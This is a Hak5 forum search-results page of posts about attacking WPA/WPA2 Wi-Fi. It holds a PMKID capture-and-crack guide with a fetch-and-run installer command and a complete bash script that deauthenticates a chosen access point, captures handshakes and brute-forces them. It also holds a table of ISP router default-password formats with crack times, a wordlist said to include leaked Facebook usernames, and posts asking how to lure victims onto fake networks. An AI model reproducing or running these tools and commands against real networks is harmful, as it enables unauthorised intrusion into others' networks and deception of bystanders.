Jump to content

Search the Community

Showing results for tags 'Wpa2'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 25 results

  1. PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKID's in a minute or less, even without access-points! ONLY use hcxdumptool on networks and devices you have expressive permission to, because of this: hcxdumptool is able to prevent complete wlan traffic! hcxdumptool is able to capture PMKID's from access points (only one single PMKID from an access point is required!) hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required!) hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required!) hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS) hcxdumptool is able to capture passwords from the wlan traffic hcxdumptool is able to capture plain master-keys from the wlan traffic hcxdumptool is able to capture usernames and identities from the wlan traffic This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)! The main advantages of this attack are as follow: No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack) No more waiting for a complete 4-way handshake between the regular user and the AP No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results) No more eventual invalid passwords sent by the regular user No more lost EAPOL frames when the regular user or the AP is too far away from the attacker No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds) No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID. This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools gets updated often, i will have to update the packages often. So please check back for updates! Download: hcxtools (v6.1.2-1) Download: hcxdumptool (v6.1.2-1) Download and install both tools automatically by using this command on your Pineapple: wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/openwrt-19.07/INSTALL.sh | bash -s -- -v -v Last update: 18.09.2020 Changelog: Updated both tools to follow changes from upstream (@ZerBea) Install procedure: Download the IPK's to your Pineapple and install them using opkg. (If you're using the Nano remember to install them to your SD-card) How do i use this? Chose an interface, and make sure it's NOT being used on anything else! Let's use wlan1 in this example. (This will set the interface to monitor mode while working) hcxdumptool -o test.pcapng -i wlan1 --enable_status 3 This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16 ?. Use --help for more info) Filters can also be applied with --filterlist and --filtermode (Again, read --help for details) You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat. hcxpcaptool -z test.16800 test.pcapng The next step would be to transfer test.16800 to a desktop, capable of running the latest version of hashcat. (Version 4.2.0 or higher) And then run the attack, for example like this: (This cracking process shoult NOT be done on the Pineapple!!!) hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' Github repo. + source-codes: https://github.com/adde88/hcxtools-hcxdumptool-openwrt https://github.com/adde88/openwrt-useful-tools The first repo. contains the IPK files, and the SDK Makefiles needed to compile the project yourelf. The second repo contains alot of other useful tools i've compiled over time for the Pineapple, if you're interested in taking a peek. Donations are very helpful, and very much appreciated! And would help me contribute towards keeping all of these custom tools ported, alive, and up-to-date! ❤
  2. Compressed File Size: 4.4gb Decompressed File Size: 13gb Just thought i would share the link for those who are looking for a decent list to pen test their networks. The list contains 982,963,904 words exactly no dupes and all optimized for wpa/wpa2. Would also just like to point out that this is not my work, instead it was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) i will be seeding this torrent indefinitely since it is shareware! 20mb up! INFO This is my final series of WPA-PSK wordlist(S) as you can't get any better than this ! My wordlist is compiled from all known & some unknown internet sources such as; 1. openwall 2. coasts password collections 3. Xploitz Master Password Collection(s) vol 1 and vol 2 (official Backtrack 3/4/4R1 wordlist collections, Thanks Xploitz) 4. ftp sites such as; ftp://ftp.ox.ac.uk/pub/wordlists/ & others 5. all wordlists onand(as of 07/11/2010) 6. all wordlists hosted on; 7. all usernames from "100 million Facebook usernames and personal details" as leaked onto Torrent sites 8. all wordlists from the Argon (site now closed) And as a bonus my personal wordlist of 1.9 GB ! Which also includes; My "WPA-PSK WORDLIST 2 (107MB).rar" & "WPA-PSK WORDLIST (40 MB).rar" Torrent & random usernames grabed from over 30,000+ websites such as youtube, myspace, bebo & outhers sites witch i can't mention .... he he ============================================================================= ALL WITH NO DUPES OR BULL-SHIT AND IS FORMATTED TO WPA RULES OF 8-63 CHARS !! ============================================================================= Hope you enjoy. :¬) ******** P.L.E.A.S.E S.E.E.D W.H.E.N ******** The Pirate Bay Download Link ISO Hunt Download Link Torrent Hound Download Link Hope this helps any one who is starting out and learning about pen testing and network security, and don't forget to seed for others!
  3. So I just got my pineapple very recently and I had a simple question. how do I forced people to connect to my network. here's an example. I'm at Starbucks and the original Starbucks Wi-Fi is running. so I created a fake Starbucks SSID for people to connect to. Is there a way to forced people to connect to my fake Starbucks instead of the original?
  4. So I have just got my WiFi Pineapple Nano and been playing around with it for a couple of days. I can see the option of creating an open rogue AP. But what I want to do is to create one with a WPA2 password, so it becomes more convincing for potentials victims to connect. Also to impersonate office environments where I already know the WPA2 password. I don't really see any option for doing so in the GUI, nor do I see it in any of the modules. I am wondering if it is at all possible to do so?
  5. I have recently purchased a WiFi Pineapple Nano and was wondering if it was possible to not only impersonate open WiFi networks, but also encrypted ones, by accepting whatever password is first entered. I have attempted to do some quick research about WiFi standards, but did not really find anything about that. What is stopping this from being done? Is the PSK saved on the device, rendering the pineapple useless?
  6. Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.
  7. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are; 13,774,031,184 password hashes per day 573,917,966 per hour 9,565,299 per minute 159,421 per second Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info! SSID Length Password Format Combinations Time 2WIREXXX 10 0-9 10,000,000,000 17 hrs 3MobileWiFi 8 0-9 a-z 2,821,109,907,456 7 mth 3Wireless-Modem-XXXX 8 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) 65,536 1 sec Alice_XXXXXXXX 24 0-9 a-z 22,452,257,707,354,557,240,087,211,123,792,674,816 Never AOLBB-XXXXXX 8 0-9 A-Z 2,821,109,907,456 7 mth ATT### 10 0-9 10,000,000,000 17 hrs ATTxxxx 0000 10 0-9 A-Z 3,656,158,440,062,976 Never ATTxxxxxxx 12 a-z + symbols 1,449,225,352,009,601,191,936 Never belkin.xxx 8 2-9 a-f 1,475,789,056 2.5 hrs belkin.xxxx 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin.XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin_XXXXXX 8 0-9 A-F 4,294,967,296 7.5 hrs BigPondXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth BOLT!SUPER 4G-XXXX 8 4 numbers + Last 4 of SSID 65,536 1 sec BrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. BTHomeHub(1)-XXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth BTHomeHub2-XXXX 10 2-9 a-f 289,254,654,976 3 wks BTHub3 10 2-9 a-f 289,254,654,976 3 wks BTHub4 10 2-9 a-f 289,254,654,976 3 wks BTHub5 10 2-9 a-f 289,254,654,976 3 wks BTHub6 10, 12 0-9 a-z A-Z 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 Never CenturyLinkXXXX 14 0-9 a-f 72,057,594,037,927,936 Never Cisco 26 0-9 a-f 43,608,742,899,428,874,059,776 Never Digicom_XXXX 8 0-9 A-Z 2,821,109,907,456 7 mth DJAWEB_##### 10 0-9 10,000,000,000 17 hrs Domino-XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs E583x-xxxx 8 0-9 10,000,000 1 min E583x-xxxxx 8 0-9 A-F 4,294,967,296 7.5 hrs EasyBox 904 LTE 9 0-9 a-z A-Z 13,537,086,546,263,552 Never EasyBox-###### 9 0-9 A-F 68,719,476,736 5 days EEBrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. FRITZ!Box Fon WLAN #### 16 0-9 10,000,000,000,000,000 Never FrontierXXXX 10 0-9 10,000,000,000 17 hrs Hitron 12 0-9 A-Z (sometimes use the device’s serial number as the default key!) 4,738,381,338,321,616,896 Never INFINITUM#### 10 0-9 10,000,000,000 17 hrs iPhone 5 ? Lowercase word plus 4 numbers 172000^65,536 Need dict. Keenetic-XXXX 8 0-9 a-z A-Z 218,340,105,584,896 Never Linkem_XXXXXX 8 0-9 10,000,000 1 min Livebox-XXXX ? ? mifi2 13 0-9 A-Z 170,581,728,179,578,208,256 Never MobileWifi-xxxx 8 0-9 10,000,000 1 min MYWIFI (EE) - MYWIFI + 4 numbers 65,536 1 sec NETGEARXX - Adjective + Noun + 3 numbers Need dict. Netia-XXXXXX 13 0-9 a-f 4,503,599,627,370,496 Never ONOXXXX 10 0-9 10,000,000,000 17 hrs Orange-0a0aa0 8 0-9 a-f 4,294,967,296 7.5 hrs Orange-AA0A00 12 0-9 A-F 281,474,976,710,656 Never Orange-XXXX 8 2345679 ACEF 214,358,881 23 mins PLDT - PLDTWIFI + Last 5 digits of router MAC 1 1 sec Plusnet Broadband UK 64 a-z A-Z 0-9 - Never PlusnetWireless-XXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth PLUSNET-XXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Sitecom_XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs SKYXXXXX 8 A-Z http://www.ph-mb.com/products/sky-calc 208,827,064,576 2 wks SpeedTouchXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TALKTALK-XXXXXX 8 346789 A-Z (bar ILOSZ) 282,429,536,481 3 wks TDC-#### 9 0-9 a-f 68,719,476,736 5 days Tech_XXXXXXXX 8 A-Z 208,827,064,576 15 days Technicolor-Router 10 0-9 A-F 1,099,511,627,776 2.5 mth Telecom-XXXXXXXX ? ? TelstraXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TELUSXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Thomson 10 0-9 A-F 1,099,511,627,776 2.5 mth ThomsonXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TIM_PN51T_XXXX 8 0-9 WPS PIN is 12345670 10,000,000 1 min TNCAP-XXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TNCAPXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TP-LINK_###### 8 0-9 0-9 A-F 10,000,000 1 min TRENDnet TEW-123ABC 11 First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries 2,821,109,907,456 7 mth TRKASHI-###### 8 2 numbers, 6 digits (10^2)^(26^6) Need dict. UNITE-XXXX 8 0-9 10,000,000 1 min UPCXXXXXXX 8 A-Z 208,827,064,576 15 days Verizon MIFIXXXX XXXX 11 0-9 100,000,000,000 7.5 days virginmediaXXXXXX 8 a-z (bar iol) 78,310,985,281 6 days VirginMobile MiFiXXXX XXX 11 0-9 100,000,000,000 7.5 days VMXXXXXXX 12 0-9 a-z A-Z 3,226,266,762,397,899,821,056 Never VMXXXXXXX-2G 8 a-z (bar iol) 78,310,985,281 6 days VMXXXXXXX-5G 8 a-z (bar iol) 78,310,985,281 6 days Vodaphone_XXXXXXXX 15 0-9 a-z 221,073,919,720,733,357,899,776 Never WLAN1-XXXXXX 11 0-9 A-F 17,592,186,044,416 Never ZyXELXXXXXX 13 10 0-9 A-Z 0-9 A-F 1,099,511,627,776 2.5 mth Please inform me of any inaccuracies or additional data you feel could be added. Enjoy! *edit* My sources are my own personal experiences, plus; http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/ https://scotthelme.co.uk/ee-brightbox-router-hacked/ https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959 https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  8. Hi There, Does anyone know how to broadcast only the SSID without security, so only the open networks? My nano is now broadcasting all networks, so all the networks with password will also be broadcasted without password from my nano. Thanks!
  9. Hi all, As the title suggests, I was wondering why WPA should be easier to crack than WPA2, and yet the process to crack them appears to be the same? The hash mode in Hashcat is exactly the same for WPA and WPA2, so surely they would take the exact same amount of time to break? Is there a quicker way to break WPA? I found http://www.aircrack-ng.org/doku.php?id=tkiptun-ng, but this appears to only be for WPA-TKIP, and doesn't look like a finished product. At the moment, are we doomed to cracking WPA using the same methods as WPA2? Thanks.
  10. I need a 12 character AZ 09 wordlist. When I try to make one with Crunch on Kali the size is astronomical. It would be nice to be able to have crunch create a list for me that automatically prunes itself to keep a constant size consistent with the passwords per-second. http://lastbit.com/pswcalc.asp is suggesting to try every AZ09 12 digit password would probably take well longer than my lifetime. Regardless if anyone knows how to make a self deleting wordlist I would be interested to learn even if it will not be utilized where I imagined it being used. Thanks everyone.
  11. I would like to ask about tutorials on certain subjects. I know SSL stripping is already online, but there are a few things I'd like to learn to do with my wifi pineapple: viewing traffic on an open network password sniffing cracking wpa/wpa2, even if it doesn't have wps enabled (the whole process) sniffing traffic on a wpa/wpa2 network Also, I don't know if you have tutorials for all of this already, but I really think it would be good to go from beginner pineapple skills, all of the way through expert, so I could become a more experienced hacker. I don't see tutorials for every infusion out there and I think there are less then 500 different infusions for the mark v. Could someone help me out with finding english tutorials for this stuff?
  12. I just got my WiFi Pineapple Nano a few days ago, and have been trouble getting it connected to the internet. The WiFi AP I'm trying to get it to connect to is secured via WPA2 Enterprise. You have to use a username and password to login to the network. My laptop is connected successfully, and I have shared the network connection to the Pineapple, but it still wont connect. Routing Table attached.
  13. What are some effective attacks using the pineapple against encrypted networks where the passphrase is already known? Let's assume you only get to use the pineapple, so no kali or laptops or anything like that. One method I can think is for an attacker to respond to beacon requests with an encrypted, spoofed AP using the known passphrase, but I don't think that is possible using the pineapple. I realize that may be a convoluted, ill-thought up method, but is that even possible at all? I understand a bit about handshakes etc, but would it be possible if the pineapple had a little different hardware or software? Just curious about that one really. Would most of you just use ssl-strip and ettercap or something? Thanks for your time.
  14. Hey Everyone. Who has heard of Sophos? or Warbiking? prehaps you may know it as War Driving Sophos is a UK Based Security company and they are doing a very nice job of showing security experts the general habits of the people hungry for Wifi. Whats very intresting - is he is doing it all with the Hak 5 Wifi Pineapple. If you watch a video you can see it there - clearly James is not about to reveal what it really is loosly calling it a "Access point" but any one from here will see its a Mk 5. Latest News artical - 'Warbiking' reveals increasing need for Sydneysiders to change wireless security habitshttp://www.cmo.com.au/mediareleases/19781/warbiking-reveals-increasing-need-for/ For those of you in London, San Fran etc, you may find your city has already been "Warbiked" by this fellow. http://www.sophos.com/en-us/security-news-trends/security-trends/bottom-line/project-warbike.aspx As This fellow is not going to get to every town and city - it would be cool to see other members survey results. how does your town compare to the recent results of Sydney?
  15. Hello everyone, I apologize if I have missed a thread where this has been covered and appreciate your help and time ^^ I have this card and I could set the tx power on windows 7 and after installing windows 8.1 pro I cannot find this option anymore, help ? I think there is an option to set the tx power even higher, anyone know? Problem I have is when I use windows 7 in VMWare, for some reason there isn't any tx power option, maybe only when it's installed as host? Also I have other questions regarding finding wpa key, can I post it here?
  16. So I ordered a Pineapple some time ago, and I'm receiving it soon. I just read the FED and it said that the Pineapple can't bait encrypted networks. Does this mean that I can't get people on WPA2 networks on my Pineapple?
  17. This my first (more than 5 line) bash script. If you have any suggestions/tips for improvment, I'm all ears. Its designed to run on kali, but should be easily portable to other pentesting distros (or it might work right out of the box, idk i havent tested with anything else). What it does: 1. Starts a moniter mode on the interface of your choosing. 2. Spoofs you MAC if you so desire. 3. Runs airodump-ng. 4. Prompts user for a BSSID/channel. 5. Creates a ~/Handshakes folder in your home directory. 6. Dumps the user specified network traffic to the created ~/Handshakes folder. 7. While dumping traffic opens an xterm window that deauthenticates the previously specified AP. 8. Asks the user if they would like to start again from step 3. 9. Shuts down mon0, changes back to perment mac (if they want). 10. Gives the user the a number of options for attacking the handshake with aircrack-ng, these include: a) Running the preincluded rockyou.txt in kali (automaticlly decompresses). b) A number of bruteforce attacks. (7 predefined options) c) Allows the user to pass there own arguments to crunch. RAW code: #!/bin/bash clear echo "" #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' MONITER=mon0 #End configuration echo "***************************************" echo "***********AIRCRACKED V-2.0************" echo "***************************************" echo "** **" echo "** Wrtten by @thisguysayswht **" echo "** Email: hofmanjosh555@yahoo.com **" echo "** **" echo "** Usage: **" echo "** **" echo "** Starts moniter interface **" echo "** Spoofs MAC adderss **" echo "** Runs airodump-ng **" echo "** Creates Handshake directory **" echo "** Dumps specified network traffic **" echo "** Deauthenticates specified AP **" echo "** Captures handshake **" echo "** Restores wireless interfaces **" echo "** Runs aircrack-ng **" echo "** **" echo "***************************************" echo "***************************************" echo "" echo "" echo "========Press enter to continue========" read START if [[ $START == "" ]]; then sleep 2 clear fi #Use at your own risk... echo "---------------------------------------------------" echo "-Would you like to start a moniter interface[y/n]?-" echo "---------------------------------------------------" echo "" read MONIF if [[ $MONIF == 'y' ]]; then echo "" iwconfig echo "Please select a wireless interface from above" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 2 clear echo "Starting interface on $WIRELESS..." sleep 2 airmon-ng start $WIRELESS sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi echo "----------------------------------------" echo "-Would you like to spoof your MAC[y/n]?-" echo "----------------------------------------" echo "" read MACSPF if [[ $MACSPF == 'y' ]]; then echo "" echo "Shutting down all wireless interfaces..." echo "" sleep 2 ifconfig $WIRELESS down ifconfig $MONITER down echo "Changing to random MAC..." echo "" sleep 2 macchanger -r $WIRELESS macchanger -r $MONITER echo "" echo "Bringing spoffed interfaces up..." echo "" sleep 4 clear ifconfig $WIRELESS up ifconfig $MONITER up else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "--------------------------------------------------" echo "-Would you like to dump the network traffic[y/n]?-" echo "--------------------------------------------------" echo "" read DUMP if [[ $DUMP == 'y' ]]; then echo "" echo "Dumping network traffic...[Ctrl-C to stop]" sleep 4 airodump-ng $MONITER else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------" echo "-Would you like to capture a handshake[y/n]?-" echo "---------------------------------------------" echo "" read HANDC if [[ $HANDC == 'y' ]]; then echo "" echo "Creating directory Handshakes..." echo "" sleep 2 cd ~ mkdir Handshakes &> /dev/null echo "" echo "Please enter the network BSSID:" echo "" read BSSID [[ $BSSID == "" ]] echo "" echo "Please enter the network channel:" echo "" read CHNEL [[ $CHNEL == "" ]] airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER & sleep 6 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" && exec -c clear else echo "" echo "Skipping..." sleep 2 clear fi echo "---------------------------------------------------" echo "-Would you like to capture another handshake[y/n]?-" echo "---------------------------------------------------" echo "" read AGAIN if [[ $AGAIN == "n" ]]; then break echo "" echo "Skipping..." sleep 2 clear fi done clear echo "-----------------------------------------------------------------------" echo "-Would you like to restore your previous interface configuration[y/n]?-" echo "-----------------------------------------------------------------------" echo "" read RESTOR if [[ $RESTOR == "y" ]]; then echo "" echo "Disabling moniter mode..." sleep 2 airmon-ng stop $MONITER echo "Shutting down main wireless interface..." echo "" sleep 2 ifconfig $WIRELESS down echo "Restoring perment MAC..." echo "" sleep 2 macchanger -p $WIRELESS echo "" echo "Bringing main wireless interface back up..." echo "" sleep 2 ifconfig $WIRELESS up echo "Wireless interfaces restored" echo "" sleep 4 clear else echo "" echo "Skipping..." sleep 2 clear fi while true do clear echo "*****************************************************" echo "*******************Select option*********************" echo "*****************************************************" echo "** **" echo "** 1. View handshakes (Ctrl-C to exit) **" echo "** 2. Use rockyou.txt (4 hours) **" echo "** 3. Bruteforce 8 numeric (1 day 6 hrs) **" echo "** 4. Bruteforce 9 numeric (12 days) **" echo "** 5. Bruteforce 10 numeric (4 months) **" echo "** 6. Bruteforce 8 a-z (7 years) **" echo "** 7. Bruteforce 8 A-Z (7 years) **" echo "** 8. Bruteforce 8 a-z + numeric (91 years) **" echo "** 9. Bruteforce 8 A-Z + numeric (91 years) **" echo "** 10. Bruteforce 8 a-z + A-Z (1719 years) **" echo "** 11. Bruteforce custom (???) **" echo "** **" echo "*****************************************************" echo "**********All calculations done @1000 pmk/s**********" echo "*****************************************************" echo "" read n case $n in 1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;; 2)clear echo "Decompressing rockyou.txt..." gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null echo "" sleep 2 echo "Starting attack..." sleep 3 aircrack-ng -w $WORDLIST $HANDSHAKE echo "" read -p "Press any key to return to script";; 3)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 numeric" echo "" crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 4)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 5)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 6)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 7)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 8)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 9)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 10)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; 11)clear echo "Enter the BSSID of the network you wish to attack" echo "" read FKUAC [[ $FKUAC == "" ]] echo "What arguments would you like to pass to crunch?" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE echo "" read -p "Press any key to return to script";; *)clear echo "Invalid option" echo "" read -p "Press any key to return to script";; esac sleep 1 done Executable: Apparetly it wont let me upload "this kind of file", if anyone has a workaround let me know. For now just copy/paste into a text editor, save, and chmod -x /the/file in a terminal (or right click >permissions>allow executing of this file) Disclaimer: This code was written for educational purposes only. I am not responsible for what you do with this code. If this code sets your computer on fire, I am not responsible. If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible. This code is designed to test the security of your router, and not anyone else's. If this code gets you laid, I might take responsibility. If you use this code, you are agreeing that it is at your own risk.
  18. Hello, I've been using the pineapple's client mode quite happily on my routers in location 1, but am having no luck with any in location 2 - something I must assume is due to encryption types. I had read a few topics here regarding the issue (in particular one from 2013 mentioning a config alteration) but haven't had any luck. If someone could point me to existing topics on the matter or tell me what logs to post here for diagnosis that'd be great. Cheers, HP
  19. I have 2 additional wireless adaptors connected to my MK5 and I need to connect wlan3 to a WPA/WPA2 wireless network. What command do I run to connect to a WPA/WPA2 wireless network? Interface Chipset Driver wlan0 Atheros ath9k - [phy0] wlan1 RTL8187 rtl8187 - [phy1] wlan2 RTL8187 rtl8187 - [phy2] wlan3 Atheros ath9k - [phy3]
  20. Hi, I searched for this topic on the internet and forums, so here I go I may not be asking this question correctly,but is there a way to keep one of the radio's encrypted(perhaps by karma broadcast) so that I could broadcast a secure connection, and leave one of the radios open for normal use Or possibly a way to make both encrypted for "legitimate" wifi use.
  21. Hi, I am running pinneaple 2.8.0. I am unable to join as a client to my AP: Apr 21 21:07:55 Pineapple kern.info kernel: [ 3345.130000] wlan1: authenticate with Apr 21 21:07:55 Pineapple kern.info kernel: [ 3345.310000] wlan1: send auth to (try 1/3) Apr 21 21:07:58 Pineapple kern.info kernel: [ 3348.350000] wlan1: send auth to (try 2/3) Apr 21 21:08:00 Pineapple kern.info kernel: [ 3350.310000] wlan1: deauthenticating from by local choice (reason=3) Apr 21 21:08:01 Pineapple kern.info kernel: [ 3351.630000] wlan1: authenticate with Apr 21 21:08:01 Pineapple kern.info kernel: [ 3351.790000] wlan1: send auth to (try 1/3) This sequence is in a loop, it cannot authenticate to the AP even when it's an open network. As per previous threads, I have checked the network manager settings and everything was set up correctly on my side. My main router/wifi AP sees the mac address of the pinneaple wlan1 and has IP assigned to it however it is unable to ping the IP assigned to wlan1 on pineapple and pinneaple status shows no wlans associated and no Ip addresses for wlan1. I have tried setting the WLAN 1 ssid/pwd via iwconfig, wireless script and network manager, the log always showed the same issue as shown before. I have just one wpa_supplicant process running, wifi interface settings look good/reflect those in network manager. Any ideas on what to check? Thanks. Rakim
  22. I have been using reaver to brute-force attack a WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i cannot crack it since i don't have a proper dictionary to and i don't have the means to download one. I look forward to a reply to this thread. Thank you ^_^
